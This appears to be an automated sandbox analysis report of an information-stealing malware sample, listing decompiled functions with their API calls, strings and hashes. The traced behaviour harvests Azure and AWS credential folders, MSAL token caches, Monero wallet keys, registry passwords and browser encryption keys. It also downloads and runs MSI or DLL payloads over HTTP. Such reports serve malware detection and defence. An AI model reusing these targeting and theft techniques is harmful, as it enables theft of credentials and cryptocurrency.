                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: c9babe69753b6e27c41428ba3435d60c6f2f3b1fa019d8badc9e2fbf8e826ee5
                                    • Instruction ID: 2744fe124e270d37e063657b2e615c5a7f725c225c9edf58588da1656cf51d2b
                                    • Opcode Fuzzy Hash: c9babe69753b6e27c41428ba3435d60c6f2f3b1fa019d8badc9e2fbf8e826ee5
                                    • Instruction Fuzzy Hash: 31813D71911118ABEB24DB51CC91FEAB7B8FF48701F008299E609A7190DF746F89CFA5
                                    Function 00954D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00958DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00958E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00954DCD
                                      • Part of subcall function 00954910: wsprintfA.USER32 ref: 0095492C
                                      • Part of subcall function 00954910: FindFirstFileA.KERNEL32(?,?), ref: 00954943
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00954E59
                                      • Part of subcall function 00954910: StrCmpCA.SHLWAPI(?,00960FDC), ref: 00954971
                                      • Part of subcall function 00954910: StrCmpCA.SHLWAPI(?,00960FE0), ref: 00954987
                                      • Part of subcall function 00954910: FindNextFileA.KERNEL32(000000FF,?), ref: 00954B7D
                                      • Part of subcall function 00954910: FindClose.KERNEL32(000000FF), ref: 00954B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00954EE5
                                      • Part of subcall function 00954910: wsprintfA.USER32 ref: 009549B0
                                      • Part of subcall function 00954910: StrCmpCA.SHLWAPI(?,009608D2), ref: 009549C5
                                      • Part of subcall function 00954910: wsprintfA.USER32 ref: 009549E2
                                      • Part of subcall function 00954910: PathMatchSpecA.SHLWAPI(?,?), ref: 00954A1E
                                      • Part of subcall function 00954910: lstrcat.KERNEL32(?,015EE4B0), ref: 00954A4A
                                      • Part of subcall function 00954910: lstrcat.KERNEL32(?,00960FF8), ref: 00954A5C
                                      • Part of subcall function 00954910: lstrcat.KERNEL32(?,?), ref: 00954A70
                                      • Part of subcall function 00954910: lstrcat.KERNEL32(?,00960FFC), ref: 00954A82
                                      • Part of subcall function 00954910: lstrcat.KERNEL32(?,?), ref: 00954A96
                                      • Part of subcall function 00954910: CopyFileA.KERNEL32(?,?,00000001), ref: 00954AAC
                                      • Part of subcall function 00954910: DeleteFileA.KERNEL32(?), ref: 00954B31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: a5ced6f22c20606167ce38b68b723eb1931b4398672c67c333a7af52a2a3f244
                                    • Instruction ID: 56a7ace6c5d9fb6395015d13a7ea6097949cb050b5d3f90f6f1affec8fb684f6
                                    • Opcode Fuzzy Hash: a5ced6f22c20606167ce38b68b723eb1931b4398672c67c333a7af52a2a3f244
                                    • Instruction Fuzzy Hash: 6641717A94020467DB54F770DC87FEE7238ABA4705F404594B689660C1EEB46BCDCBA2
                                    Function 00959010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0095906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 925bfaad52790ed06ab47ecd703d2e859bf255a33d06864cd5714c9e172c287b
                                    • Instruction ID: 7d5833ce48af16c0ebceef6f6fb081fee22556f1b49988e5e931dda299365ff9
                                    • Opcode Fuzzy Hash: 925bfaad52790ed06ab47ecd703d2e859bf255a33d06864cd5714c9e172c287b
                                    • Instruction Fuzzy Hash: 8971CD75910208EBEB04DFE5DC89FEEB7B8BB88701F108509F615AB294DB34A945CB61
                                    Function 00952E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 009531C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0095335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 009534EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 0c54e3f62f282bf3fae33eab937bda908aa22bddd216be69ef2463f2d4e0b0ae
                                    • Instruction ID: 8d8e5db2a5fa79e1ca63ae3b287d52dfc3f345774e83ea26b44797736a773deb
                                    • Opcode Fuzzy Hash: 0c54e3f62f282bf3fae33eab937bda908aa22bddd216be69ef2463f2d4e0b0ae
                                    • Instruction Fuzzy Hash: EB120F718001189ADB19EBA1DC92FDEB778AF94301F504259F90676191EF342B4ECFAA
                                    Function 009552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 00946280: InternetOpenA.WININET(00960DFE,00000001,00000000,00000000,00000000), ref: 009462E1
                                      • Part of subcall function 00946280: StrCmpCA.SHLWAPI(?,015EE590), ref: 00946303
                                      • Part of subcall function 00946280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00946335
                                      • Part of subcall function 00946280: HttpOpenRequestA.WININET(00000000,GET,?,015ED9E8,00000000,00000000,00400100,00000000), ref: 00946385
                                      • Part of subcall function 00946280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009463BF
                                      • Part of subcall function 00946280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009463D1
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00955318
                                    • lstrlen.KERNEL32(00000000), ref: 0095532F
                                      • Part of subcall function 00958E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00958E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00955364
                                    • lstrlen.KERNEL32(00000000), ref: 00955383
                                    • lstrlen.KERNEL32(00000000), ref: 009553AE
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 89ce8fb429612ff840051366df55e3dac553c73f8e2ac5a2851fdb46c8fee658
                                    • Instruction ID: c2fd135832ac4fc58ba92298854e1fc7e964eb32653ca505c4fe4472a5df291a
                                    • Opcode Fuzzy Hash: 89ce8fb429612ff840051366df55e3dac553c73f8e2ac5a2851fdb46c8fee658
                                    • Instruction Fuzzy Hash: A3510C309101489BDB18FF61CD96BED7779AF90302F504118FD065B5A2EF346B4ACBAA
                                    Function 009512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 7e5c52cbcfd162efc6ee8dbbd8a1267982fdfc504cd124acee93162fc96aa9d8
                                    • Instruction ID: c7e5668dd1d30d56334e18189f219641d3f2e7e37a9e00689970601cb4513d19
                                    • Opcode Fuzzy Hash: 7e5c52cbcfd162efc6ee8dbbd8a1267982fdfc504cd124acee93162fc96aa9d8
                                    • Instruction Fuzzy Hash: 39C1D8B59002099BCB14EF61DC89FEE7378BF94305F004599F90A67291EF70AA89CF95
                                    Function 00954280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00958DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00958E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 009542EC
                                    • lstrcat.KERNEL32(?,015EDE68), ref: 0095430B
                                    • lstrcat.KERNEL32(?,?), ref: 0095431F
                                    • lstrcat.KERNEL32(?,015ECE40), ref: 00954333
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 00958D90: GetFileAttributesA.KERNEL32(00000000,?,00941B54,?,?,0096564C,?,?,00960E1F), ref: 00958D9F
                                      • Part of subcall function 00949CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00949D39
                                      • Part of subcall function 009499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009499EC
                                      • Part of subcall function 009499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00949A11
                                      • Part of subcall function 009499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00949A31
                                      • Part of subcall function 009499C0: ReadFile.KERNEL32(000000FF,?,00000000,0094148F,00000000), ref: 00949A5A
                                      • Part of subcall function 009499C0: LocalFree.KERNEL32(0094148F), ref: 00949A90
                                      • Part of subcall function 009499C0: CloseHandle.KERNEL32(000000FF), ref: 00949A9A
                                      • Part of subcall function 009593C0: GlobalAlloc.KERNEL32(00000000,009543DD,009543DD), ref: 009593D3
                                    • StrStrA.SHLWAPI(?,015EDEB0), ref: 009543F3
                                    • GlobalFree.KERNEL32(?), ref: 00954512
                                      • Part of subcall function 00949AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949AEF
                                      • Part of subcall function 00949AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00944EEE,00000000,?), ref: 00949B01
                                      • Part of subcall function 00949AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949B2A
                                      • Part of subcall function 00949AC0: LocalFree.KERNEL32(?,?,?,?,00944EEE,00000000,?), ref: 00949B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 009544A3
                                    • StrCmpCA.SHLWAPI(?,009608D1), ref: 009544C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 009544D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 009544E5
                                    • lstrcat.KERNEL32(00000000,00960FB8), ref: 009544F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: 260e599b7cb8de9bac6966414da17514dda595392be7a99fbd51677d5c337d97
                                    • Instruction ID: 4d714e2efc3a2915f53a9af3253f9e1978087c302bf16d16499037e45e025a86
                                    • Opcode Fuzzy Hash: 260e599b7cb8de9bac6966414da17514dda595392be7a99fbd51677d5c337d97
                                    • Instruction Fuzzy Hash: B87167B6900208ABDB14EBB0DC85FEE737DAB88301F004599F605A7191EE34DB49CFA1
                                    Function 00941310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009412B4
                                      • Part of subcall function 009412A0: RtlAllocateHeap.NTDLL(00000000), ref: 009412BB
                                      • Part of subcall function 009412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009412D7
                                      • Part of subcall function 009412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009412F5
                                      • Part of subcall function 009412A0: RegCloseKey.ADVAPI32(?), ref: 009412FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094134F
                                    • lstrlen.KERNEL32(?), ref: 0094135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00941377
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 00958B60: GetSystemTime.KERNEL32(00960E1A,015E9D28,009605AE,?,?,009413F9,?,0000001A,00960E1A,00000000,?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 00958B86
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00941465
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009499EC
                                      • Part of subcall function 009499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00949A11
                                      • Part of subcall function 009499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00949A31
                                      • Part of subcall function 009499C0: ReadFile.KERNEL32(000000FF,?,00000000,0094148F,00000000), ref: 00949A5A
                                      • Part of subcall function 009499C0: LocalFree.KERNEL32(0094148F), ref: 00949A90
                                      • Part of subcall function 009499C0: CloseHandle.KERNEL32(000000FF), ref: 00949A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 009414EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: f59920b106a173fed370a540e6121113615555b1e2b5888dcb7efd97f0f8dd3c
                                    • Instruction ID: 67b38b1b9bef7dac3221fbd02abd080380395a0179c457906157a21b28fff4ce
                                    • Opcode Fuzzy Hash: f59920b106a173fed370a540e6121113615555b1e2b5888dcb7efd97f0f8dd3c
                                    • Instruction Fuzzy Hash: 605146B1D5011957CB15FB61DD92FED733CAF94301F404298B60A62091EE346B8DCFAA
                                    Function 009475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0094733A
                                      • Part of subcall function 009472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009473B1
                                      • Part of subcall function 009472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0094740D
                                      • Part of subcall function 009472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00947452
                                      • Part of subcall function 009472D0: HeapFree.KERNEL32(00000000), ref: 00947459
                                    • lstrcat.KERNEL32(00000000,009617FC), ref: 00947606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00947648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 0094765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0094768F
                                    • lstrcat.KERNEL32(00000000,00961804), ref: 009476A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 009476D3
                                    • lstrcat.KERNEL32(00000000,00961808), ref: 009476ED
                                    • task.LIBCPMTD ref: 009476FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
